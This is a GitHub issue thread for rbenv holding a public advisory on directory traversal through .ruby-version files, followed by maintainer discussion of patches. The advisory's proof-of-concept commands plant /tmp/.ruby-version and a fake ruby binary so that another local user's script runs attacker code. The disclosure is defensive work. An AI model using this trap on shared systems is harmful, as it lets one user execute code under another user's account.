### ISSUE TITLE
OVE-20170303-0004 rbenv Ruby specification directory traversal

### ISSUE THREAD

**Issue by justinsteven** [rbenv/rbenv#977]
Hi rbenv,

I've found what I believe to be a very low-risk security issue affecting rbenv. I will be publishing the following advisory imminently. I usually back-channel security issues to projects, but I figure this is low enough of a risk to post it publicly. I can only imagine scenarios in which a local user could attack another local user in a situation requiring a high level of user interaction on behalf of the victim user.

I think the following patch would be appropriate, but at the same time thought I'd leave it to more knowledgable folks to decide the best place and way to protect against this issue in a way that wont break peoples use of things like `~/.rbenv/version` (e.g. someone might intentionally have put directory traversal sequences in that file to use a Ruby outside of their home directory)

```
17:01:03[justin@116e71652cf1 D ~/.rbenv](master/!1?2)% git diff
diff --git a/libexec/rbenv-version-file-read b/libexec/rbenv-version-file-read
index 03d2db0..f62b2ea 100755
--- a/libexec/rbenv-version-file-read
+++ b/libexec/rbenv-version-file-read
@@ -12,6 +12,13 @@ if [ -e "$VERSION_FILE" ]; then
   words=( $(cut -b 1-1024 "$VERSION_FILE") )
   version="${words[0]}"
 
+  # Bail out if $version contains directory traversal sequences
+  if (
+    [ "$version" == ".." ] ||     # detect ".."
+    [[ "$version" == */.. ]] ||   # detect "./././.." and "////.."
+    [[ "$version" == *../* ]]     # detect "../../../../foobar"
+  ); then exit 1; fi
+
   if [ -n "$version" ]; then
     echo "$version"
     exit
```

I shall leave it in your capable hands. Thanks!

---

CVE-2017-TBA rbenv Ruby specification directory traversal
---------------------------------------------------------

* OVE ID: OVE-20170303-0004
* Public disclosure date: 2017-03-04
* Affected versions: All?

When executing Ruby or a Ruby script, rbenv reads a file named `.ruby-version`
to determine the version of Ruby interpreter to execute. It will walk up the
directory tree until it finds such a file, or until it reaches `/`. If it does
not find such a file, it repeats the process starting from `$PWD`.
Documentation regarding this process is available at
<https://github.com/rbenv/rbenv/blob/master/README.md#choosing-the-ruby-version>

Once a Ruby version has been identified,
`~/.rbenv/versions/${VERSION}/bin/ruby` is used to provide Ruby.

The Ruby version specified in `.ruby-version` may contain path traversal
sequences, making it possible to specify that a `ruby` binary outside of the
user's home directory should be used to provide Ruby.

This is exploitable against local users in the following cases:

* Where a user executes a trustworthy Ruby script that is in a directory where
  the first `.ruby-version` encountered while walking upwards from the
  directory to the root directory is attacker-controlled. For example, an
  attacker may plant `/tmp/.ruby-version` to exploit a user who is executing
  `/tmp/foo/bar/fizzbuzz.rb`

* Where a user executes a trustworthy Ruby script while their `$PWD` is a
  directory where the first `.ruby-version` encountered while walking upwards
  from the directory to the root directory is attacker-controlled. For example,
  an attacker may plant `/tmp/.ruby-version` to exploit a user who is executing
  a Ruby script while they are `cd`'d to `/tmp/fizz/buzz/`

These attack scenarios are considered by the author to be highly unusual and
requires a high level of user interaction (executing Ruby scripts from, or
while `cd`'d to, a world-writable directory or a descendent thereof). This
issue is hence deemed to be low-risk.

#### Exploit a user running a Ruby script that is within `/tmp`

Create an innocent script:

```text
[justin@116e71652cf1 D ~]% mkdir -p /tmp/foo/bar/

[justin@116e71652cf1 D ~]% cat > /tmp/foo/bar/fizzbuzz.rb
#!/usr/bin/env ruby
puts 'This is fine'
^D

[justin@116e71652cf1 D ~]% chmod u+x /tmp/foo/bar/fizzbuzz.rb
```

Set the trap as `nobody`:

```text
[justin@116e71652cf1 D ~]% cat | sudo -u nobody tee /tmp/.ruby-version >/dev/null
../../../../../../../../../../../../tmp/badruby
^D

[justin@116e71652cf1 D ~]% sudo -u nobody mkdir -p /tmp/badruby/bin

[justin@116e71652cf1 D ~]% cat | sudo -u nobody tee /tmp/badruby/bin/ruby >/dev/null
#!/bin/sh
echo "Bad ruby executing as $(id)"
^D

[justin@116e71652cf1 D ~]% sudo -u nobody chmod -R a+rx /tmp/badruby

[justin@116e71652cf1 D ~]% ls -la /tmp/.ruby-version /tmp/badruby/bin/ruby
-rw-r--r-- 1 nobody nogroup 48 Mar  3 23:54 /tmp/.ruby-version
-rwxr-xr-x 1 nobody nogroup 45 Mar  3 23:55 /tmp/badruby/bin/ruby
```

Trigger the trap by executing the trustworthy script as `justin`:

```text
[justin@116e71652cf1 D ~]% /tmp/foo/bar/fizzbuzz.rb
Bad ruby executing as uid=31337(justin) gid=31337(justin) groups=31337(justin),27(sudo)
```

#### Exploit a user running a Ruby script while their `$PWD` is within `/tmp`

Create an innocent script within `~`:

```text
[justin@116e71652cf1 D ~]% mkdir -p ~/fizz/buzz

[justin@116e71652cf1 D ~]% cat > ~/fizz/buzz/foobar.rb
#!/usr/bin/env ruby
puts 'This is fine'
^D

[justin@116e71652cf1 D /tmp/fizz/buzz]% chmod u+x ~/fizz/buzz/foobar.rb 
```

`cd` to an empty directory within `/tmp`:

```text
[justin@116e71652cf1 D ~]% mkdir -p /tmp/fizz/buzz

[justin@116e71652cf1 D ~]% cd /tmp/fizz/buzz

[justin@116e71652cf1 D /tmp/fizz/buzz]% ls -la
total 8
drwxr-xr-x 2 justin justin 4096 Mar  4 00:00 .
drwxr-xr-x 3 justin justin 4096 Mar  4 00:00 ..
```

Don't bother setting the trap as `nobody` - the trap from the previous POC will
work just fine.

Trigger the trap by executing the trustworthy script as `justin`:

```text
[justin@116e71652cf1 D /tmp/fizz/buzz]% ~/fizz/buzz/foobar.rb 
Bad ruby executing as uid=31337(justin) gid=31337(justin) groups=31337(justin),27(sudo)
```

**Comment by justinsteven** [comment]
A copy of the above advisory, with minimal explanatory information, is now available at https://github.com/justinsteven/advisories/blob/master/2017_rbenv_ruby_version_directory_traversal.md

**Comment by mislav** [comment]
Thanks for taking the time to report this in such an comprehensive manner.

The `.ruby-version` file was never designed to take path segments. I wonder if we can prohibit any value that includes `/` without disrupting anyone's legimitate uses of rbenv. Thoughts?

**Comment by justinsteven** [comment]
@mislav sounds good to me from a security POV - I won't claim to know enough about Ruby-land to know the `.ruby-version` spec or whether bailing out upon `/` would break anyones use of rbenv :)

**Comment by justinsteven** [comment]
Though the case of `..` to traverse one directory up might also need to be considered. I can't think of any security implication of making somebody use `~/.rbenv/versions/../bin/ruby` as their Ruby; but it is an unintended directory traversal.

**Comment by agx** [comment]
The assigned CVE is CVE-2017-1000047 (just to make it simpler to find)

**Comment by justinsteven** [comment]
@mislav any thoughts on this? I (still) don't know enough about Ruby-land to know if prohibiting `/` in `.ruby-version` will break anyone's use of rbenv

**Comment by mislav** [comment]
@justinsteven I also don't know, but I don't want to risk it if we don't need to cut support for this feature. Would it be sufficient to disallow the string `../` anywhere in the version? I guess directory traversal could be supported as long as we don't allow going "up"

I'm not sure how easy that is to enforce; if people find their way around that using string hacks then we're back to square one 🤔

**Comment by justinsteven** [comment]
I had a few thoughts in the original report. Basically, if we ban the patterns `..`, `*/..` and `*../*` then no opportunities for traversal come to my mind (or at least came to my mind when I submitted this bug). Of course, the more specific we get about patterns, the more likely it is we leave things open to an obscure traversal.

**Comment by justinsteven** [comment]
The other thing that could be explored is using `realpath` or `readlink -f` to normalise the full path, and then doing a string comparison check to ensure it starts with `$HOME/.rbenv/versions/`

**Comment by mislav** [comment]
@justinsteven Thank you for your thoughts. I have opened a PR and would appreciate your review!

**Comment by jasonkarns** [comment]
Thanks again, @justinsteven for the report.

While preparing a pull from rbenv upstream into nodenv, I realized the current fix (#1156) would break a very common use case of version subdirectories for nodenv:  `lts/carbon`. I recognize that nodenv's use case for lts/ doesn't directly impact rbenv, but it seems that supporting subdirectories could still be a valid use case across the board.

Thoughts on reverting to the originally proposed bans on `..`, `*/..` and `*../*` specifically instead of banning directory traversal entirely?

**Comment by mislav** [comment]
@jasonkarns Thanks for bringing this to my attention. Rbenv never had explicit support for subdirectories in version names, therefore there is no functionality I'm interested in restoring just so that it could serve nodenv's purposes. However, I'd be open to accepting a PR that adds the version subdirectory functionality if it:
* defines the behavior of `rbenv versions` around subdirectories;
* adds tests for added functionality.
